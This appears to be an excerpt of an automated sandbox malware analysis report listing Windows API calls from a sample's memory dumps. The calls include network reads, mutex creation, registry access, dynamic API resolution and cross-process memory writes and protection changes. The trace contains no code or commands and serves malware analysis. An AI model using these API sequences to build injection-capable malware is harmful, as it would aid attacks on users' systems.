                    • Part of subcall function 00173710: SysFreeString.OLEAUT32(?), ref: 00173748
                    • Part of subcall function 00173710: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00173773
                    • Part of subcall function 00177A20: SysFreeString.OLEAUT32(?), ref: 00177A3C
                  • ??3@YAXPAX@Z.MSVCRT ref: 0017582F
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • WinHttpQueryDataAvailable.WINHTTP(?,?,00000000,00000000,00000001,?,?,?,?,00000000), ref: 0017CA3D
                    • Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
                    • Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
                    • Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
                    • Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042
                  • WinHttpReadData.WINHTTP(?,00000000,?,?), ref: 0017CA81
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 0017F320: memset.MSVCRT ref: 0017F33E
                    • Part of subcall function 0017F320: GetWindowsDirectoryW.KERNEL32(?,00000208), ref: 0017F352
                    • Part of subcall function 0017F320: GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0017F38E
                  • CreateMutexW.KERNELBASE(?,00000001,?), ref: 0017366B
                  • ExitProcess.KERNEL32 ref: 0017368E
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • SysAllocString.OLEAUT32(00000000), ref: 0017D919
                  • SysFreeString.OLEAUT32(00000000), ref: 0017D94D
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • _time64.MSVCRT ref: 0017CF92
                  • _time64.MSVCRT ref: 0017CFD9
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • WinHttpQueryDataAvailable.WINHTTP(?,?,00000000,00000000,00000001,?,?,?,?,00000000), ref: 0017CA3D
                    • Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
                    • Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
                    • Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
                    • Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042
                  • WinHttpReadData.WINHTTP(?,00000000,?,?), ref: 0017CA81
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00171C1A,?,0018190D,?,00171C1A,?,?), ref: 00171AFB
                  • WriteFile.KERNEL32(00000000,?,00171C1A,000000CC,00000000,?,0018190D,?,00171C1A,?,?,000000CC), ref: 00171B1D
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 00176920: memcpy.MSVCRT ref: 00176A18
                  • SysFreeString.OLEAUT32(?), ref: 00177FFB
                  • SysAllocString.OLEAUT32(0017F1F6), ref: 00178005
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • GetFileAttributesW.KERNELBASE(?,?,?), ref: 00172F1B
                  • CreateDirectoryW.KERNELBASE(?,00000000,?,?), ref: 00172F61
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • LoadLibraryW.KERNEL32(?), ref: 0017F4F8
                  • GetProcAddress.KERNEL32(00173EF7,?), ref: 0017F52D
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • CoInitializeEx.OLE32(00000000,00000000), ref: 0017BC14
                  • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0017BC33
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
                    • Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
                    • Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
                    • Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042
                  • memset.MSVCRT ref: 0017F8E0
                  • memcpy.MSVCRT ref: 0017F8EB
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                    • Part of subcall function 0017D020: lstrlenW.KERNEL32(0017F91F,00000000,00000000,?,0017F91F,80000002,00000000,?,?,?,?,?,00182A36,80000002,-00000002), ref: 0017D03D
                    • Part of subcall function 0017D020: RegOpenKeyExW.KERNEL32(80000002,0017F91F,00000000,00020119,80000002,00000000,?,0017F91F,80000002,00000000,?,?,?,?,?,00182A36), ref: 0017D061
                    • Part of subcall function 0017D020: RegOpenKeyExW.KERNEL32(80000002,0017F91F,00000000,00020119,80000002,?,0017F91F,80000002,00000000,?,?,?,?,?,00182A36,80000002), ref: 0017D07C
                    • Part of subcall function 0017D020: RegOpenKeyExW.KERNEL32(80000002,0017F91F,00000000,00020119,80000002,?,0017F91F,80000002,00000000,?,?,?,?,?,00182A36,80000002), ref: 0017D09C
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • ??2@YAPAXI@Z.MSVCRT ref: 00173EB7
                  • memset.MSVCRT ref: 00173ECD
                    • Part of subcall function 0017F4D0: LoadLibraryW.KERNEL32(?), ref: 0017F4F8
                    • Part of subcall function 0017F4D0: GetProcAddress.KERNEL32(00173EF7,?), ref: 0017F52D
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 0017F0B0: ??2@YAPAXI@Z.MSVCRT ref: 0017F1C7
                    • Part of subcall function 0017F0B0: ??3@YAXPAX@Z.MSVCRT ref: 0017F206
                    • Part of subcall function 0017F0B0: ??3@YAXPAX@Z.MSVCRT ref: 0017F29B
                    • Part of subcall function 00177A20: SysFreeString.OLEAUT32(?), ref: 00177A3C
                  • ??3@YAXPAX@Z.MSVCRT ref: 0017911F
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                    • Part of subcall function 0017F850: GetFileAttributesW.KERNELBASE(00000000,00000000,93840FC0,00000000,?,001790DF,00000000,00000000,00178BCD,00000000,00000000,00000000,00000000,001804FB,93840FC0), ref: 0017F873
                    • Part of subcall function 00171C30: ??2@YAPAXI@Z.MSVCRT ref: 00171C52
                    • Part of subcall function 00171C30: ??3@YAXPAX@Z.MSVCRT ref: 00171C9A
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • GetProcAddress.KERNEL32(00000000,?,?,001800C1,?), ref: 0017186C
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                    • Part of subcall function 00171140: VirtualFreeEx.KERNELBASE(00177A34,?,00000000,00000000,?,001779B2,?,?,00000000,00008000,00000000,00000000,00000000,00000000,?,00177A34), ref: 00171160
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • GetTokenInformation.KERNELBASE(?,00000001,?,0000004C,?), ref: 00176E5D
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • GetProcAddress.KERNEL32(00000000,?,?,00000000,0017CB21), ref: 001766BA
                    • Part of subcall function 00171140: VirtualFreeEx.KERNELBASE(00177A34,?,00000000,00000000,?,001779B2,?,?,00000000,00008000,00000000,00000000,00000000,00000000,?,00177A34), ref: 00171160
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • CoCreateInstance.OLE32(00184254,00000000,00000001,00184264,00000000,00176AB4,?,00000000), ref: 0017E7DC
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • WinHttpOpen.WINHTTP(?,00000000,00000000,00000000,00000000,00188880,?), ref: 0017508D
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 0017C8C0: GetFullPathNameW.KERNEL32(?,00000105,00000000,00000000,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0017C938
                  • GetFileAttributesW.KERNELBASE(00000000,00000000,93840FC0,00000000,?,001790DF,00000000,00000000,00178BCD,00000000,00000000,00000000,00000000,001804FB,93840FC0), ref: 0017F873
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • CoCreateInstance.OLE32(0018708C,00000000,00000001,00186E7C,00000004,00188880,000003E7,0017FF87), ref: 0017EB17
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • WriteProcessMemory.KERNELBASE(00000000,00000070,?,?,00000000,00000000,00000000,?,0017CE7B,?,?,?,00000070,?,?,?), ref: 00177B5C
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • ReadProcessMemory.KERNELBASE(00000000,00000070,?,?,00000000,00000000,00000000,?,0017CE54,?,?,?,00000070,00000000), ref: 00176DC9
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • VirtualProtectEx.KERNELBASE(0018011D,00000040,00002000,?,001800C1,001800C1,?,0017B5EC,0017CB21,00000000,?,00000002,0017CB21,00000000,C85D89F0,?), ref: 0017DC88
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • VirtualFreeEx.KERNELBASE(00177A34,?,00000000,00000000,?,001779B2,?,?,00000000,00008000,00000000,00000000,00000000,00000000,?,00177A34), ref: 00171160
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
                    • Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
                    • Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
                    • Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042
                  • memcpy.MSVCRT ref: 00176A18
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                    • Part of subcall function 001776E0: memcpy.MSVCRT ref: 001777B9
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                    • Part of subcall function 00176F50: _wtoi.MSVCRT ref: 00176F8C
                  • Sleep.KERNEL32(00009C40,?,?,?,?,?,?,?,00000000,001800C1), ref: 00175B3F
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • memcpy.MSVCRT ref: 00171FEC
                    • Part of subcall function 0017BC60: HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                    • Part of subcall function 00181F60: LoadLibraryA.KERNEL32(?), ref: 00181F87
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FA8
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FCE
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 00181FEC
                    • Part of subcall function 00181F60: GetProcAddress.KERNEL32(00000000,?), ref: 0018200A
                    • Part of subcall function 00181F60: GetProcessHeap.KERNEL32 ref: 00182015
                    • Part of subcall function 00181F60: RtlReAllocateHeap.NTDLL(001B0000,00000008,?,00180639), ref: 0018202F
                    • Part of subcall function 00181F60: RtlAllocateHeap.NTDLL(001B0000,00000008,00180639), ref: 00182042
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • Sleep.KERNELBASE(000003E8), ref: 00182AC4
                    • Part of subcall function 0017A6B0: _time64.MSVCRT ref: 0017A97C
                    • Part of subcall function 0017A6B0: _time64.MSVCRT ref: 0017AA0E
                    • Part of subcall function 0017A6B0: _time64.MSVCRT ref: 0017AAEE
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • Sleep.KERNELBASE(000003E8), ref: 00182AC4
                    • Part of subcall function 0017A6B0: _time64.MSVCRT ref: 0017A97C
                    • Part of subcall function 0017A6B0: _time64.MSVCRT ref: 0017AA0E
                    • Part of subcall function 0017A6B0: _time64.MSVCRT ref: 0017AAEE
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • HeapFree.KERNEL32(001B0000,00000008,001806F6), ref: 0017BC73
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  Memory Dump Source
                  • Source File: 00000015.00000001.10616087968.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_1_400000_ounehcnaykuM.jbxd

                  Non-executed Functions

                  APIs
                  • GetProcAddress.KERNEL32(00000000,?), ref: 0017FC4F
                  • GetProcAddress.KERNEL32(00000000,?), ref: 0017FC72
                  • GetProcAddress.KERNEL32(00000000,?), ref: 0017FC95
                  • GetProcAddress.KERNEL32(00000000,?), ref: 0017FCB8
                  Strings
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
                  • Associated: 00000015.00000002.10777642128.00188000.00000004.sdmp
                  • Associated: 00000015.00000002.10777685944.00189000.00000002.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_21_2_170000_ounehcnaykuM.jbxd
                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0017DD4D
                  • UnhandledExceptionFilter.KERNEL32(00186DB8), ref: 0017DD58
                  • GetCurrentProcess.KERNEL32(C0000409), ref: 0017DD63
                  • TerminateProcess.KERNEL32(00000000), ref: 0017DD6A
                  Memory Dump Source
                  • Source File: 00000015.00000002.10777569353.00171000.00000020.sdmp, Offset: 00170000, based on PE: true
                  • Associated: 00000015.00000002.10777536505.00170000.00000002.sdmp
                  • Associated: 00000015.00000002.10777612068.00184000.00000002.sdmp
